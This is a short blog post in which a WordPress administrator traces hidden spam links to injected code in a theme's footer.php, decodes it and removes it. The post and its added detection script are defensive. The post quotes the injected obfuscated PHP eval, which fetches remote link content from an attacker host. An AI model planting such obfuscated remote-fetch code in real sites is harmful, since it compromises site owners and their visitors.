Random div in WordPress with “position:absolute;filter:alpha(opacity=0);opacity:0.001;z-index:10”

Hello all,

I was notified about a random div that is not supposed to be on a site I administer.

There was a div with a style of

position:absolute;filter:alpha(opacity=0);opacity:0.001;z-index:10

and a bunch of random links (see image below).

Searching for anything that is in that div gave no results. So I decided to track down where it is being generated.

The first thing to blame was scripts… Using the Network analysis tab in Chrome, I refreshed the website and checked the first request that was made (it was for the HTML file). The response already had that div in the HTML code. This meant that the whole thing had to be happening on the server and was not added later by a script.

I tracked down the place in the template where the div was located (it was in the footer.php file) and found:

<?php
$c3RyX = "lFBQu3";
@eval(base64_decode("ZWNobyBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3NoZWxsLm5ueHV1LmNvbS9pbmRleC5waHA/cj1saW5rcyZ2PSRjM1J5WCIp").";");
?>

Decoding the string in the eval function confirmed the suspicion:

echo file_get_contents("http://shell.nnxuu.com/index.php?r=links&v=$c3RyX")

This was definitely added maliciously and had to be removed.

After changing all the passwords and removing the previously mentioned PHP code bit, the site is up and running as expected.
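The manual decode step above can be repeated across a whole theme directory. The following is an added example, not code from the original post: a Python triage script that finds `eval(base64_decode("..."))` calls in PHP files and decodes the payload statically, without executing it. The function names `scan_php_source` and `scan_tree` are hypothetical, and accepting typographic quotes around the payload is an assumption made so that copy-pasted snippets still match.

```python
import base64
import binascii
import re
import sys
from pathlib import Path

# eval(base64_decode("...")), optionally prefixed with @; straight or curly quotes (assumption).
EVAL_B64 = re.compile(
    r"""@?\beval\s*\(\s*base64_decode\s*\(\s*["'\u201c\u201d]([A-Za-z0-9+/=\s]+)["'\u201c\u201d]""",
    re.IGNORECASE,
)
URL = re.compile(r"""https?://[^\s"'<>)]+""")

def scan_php_source(source):
    """Return one finding per eval(base64_decode(...)) call; nothing is executed."""
    findings = []
    for match in EVAL_B64.finditer(source):
        line_no = source.count("\n", 0, match.start()) + 1
        blob = "".join(match.group(1).split())
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            decoded = None  # not valid base64; the call itself is still reported
        urls = URL.findall(decoded) if decoded else []
        findings.append({"line": line_no, "decoded": decoded, "urls": urls})
    return findings

def scan_tree(root):
    """Scan every .php file under root (for example a theme directory)."""
    results = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_php_source(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            results[str(path)] = hits
    return results

# The footer.php snippet quoted in the post, used here as sample input.
SAMPLE = '''<?php
$c3RyX = "lFBQu3";
@eval(base64_decode("ZWNobyBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3NoZWxsLm5ueHV1LmNvbS9pbmRleC5waHA/cj1saW5rcyZ2PSRjM1J5WCIp").";");
?>'''

if __name__ == "__main__":
    found = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else {"<sample>": scan_php_source(SAMPLE)}
    for file, hits in found.items():
        for hit in hits:
            print(f"{file}:{hit['line']}: {hit['decoded']!r} urls={hit['urls']}")
```

Run with a directory argument to scan its `.php` files; with no argument it scans the embedded sample.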

[Image: randomlinks]


About Vaidas Sirtautas

http://vsshs.com

Posted on September 28, 2014, in Web. 2 Comments.

  1. I have the same problem. Any chance you can guide me on how to fix it? I know how to fix each page but I need help removing the PHP code. I also would like to know how this happened.

    • Hey,

      You just have to find where the HTML code is generated and delete that bit.

      As for how it happened, I am not sure. Since this was a development site the passwords were really weak, so I changed all of them to much stronger ones and the problem does not seem to be repeating.

      Unfortunately, request logging was turned off, so I am not sure how/when exactly this happened.
